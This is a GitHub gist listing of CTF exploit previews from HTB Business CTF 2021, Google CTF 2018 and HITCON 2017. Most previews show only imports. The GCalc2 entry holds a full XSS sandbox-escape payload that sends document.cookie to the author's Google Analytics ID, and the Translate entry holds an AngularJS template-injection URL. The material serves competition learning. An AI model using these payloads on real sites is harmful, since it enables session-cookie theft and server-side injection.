Omar Ganiev beched
beched
/ simple-pwn.py
Created
July 26, 2021 14:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Exploit for the "Employee Manager" pwning challenge | |
| HTB Business CTF 2021 | |
| DeteAct (https://pentest.global/) | |
| ''' | |
| import re | |
| from pwn import * |
beched
/ mips-pwn.py
Last active
July 26, 2021 14:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Exploit for the "Spim Panel" pwning challenge | |
| HTB Business CTF 2021 | |
| DeteAct (https://pentest.global/) | |
| ''' | |
| from pwn import * | |
| def pack(x): | |
| return p32(x, endian='big') |
beched
/ zn2021_hackquest_quantum_service_exp.py
Created
June 20, 2021 22:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from math import pi | |
| from socket import socket | |
| s = socket() | |
| s.connect(('quantum.kelte.cc', 17171)) | |
| prog = '' | |
| # Hadamard for the 0th qubit | |
| prog += 'H\n' |
beched
/ gcalc2_exp.py
Last active
June 27, 2018 01:04
Google CTF 2018 Quals: GCalc2 web task solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from urllib import quote_plus | |
| ga_tid = 'UA-***-1' # put your GA id here | |
| url = 'https://gcalc2.web.ctfcompetition.com/' | |
| url += r'?expr=vars.pi.constructor.name.constructor.constructor(vars.pi.constructor.name.match().constructor(vars).keys().constructor.keys(vars).pop())()&vars=%7B%22pi%22:1.0,%22' | |
| url += quote_plus(''' | |
| script = document.createElement('script');script.src='https://www.google-analytics.com/collect?v=1&tid=%s&cid='+Math.random()+'&t=event&ec=email&el='+Math.random()+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';document.head.appendChild(script); | |
| '''.replace('"', '\\"').replace('\n','') % ga_tid) |
beched
/ translate_exp.txt
Created
June 25, 2018 10:12
Google CTF 2018 Quals: Translate web task solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This web application implements a translation service with dictionary stored in memory. | |
| One can dump the JSON dictionary and add values to it. | |
| Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are rather web-site messages, not the words). | |
| The solution is to overwrite the rendered dictionary value and to enumerate methods accessible inside AngularJS sandbox and find a method which allows local file inclusion. | |
| Executing Object.keys(): | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}} | |
| Reading the flag: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import sys | |
| from collections import defaultdict | |
| from ctypes import CDLL | |
| from pwn import * | |
| from z3 import * | |
| s = Solver() |
beched
/ baby-exp.py
Created
November 7, 2017 10:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| HITCON CTF Quals 2017 BabyFirst Revenge v2 exploit | |
| Task was to leverage 4-byte shell command execution in PHP to full RCE | |
| ''' | |
| from requests import get, post | |
| URL = 'http://52.197.41.31/?' | |
| print 'Reset all' |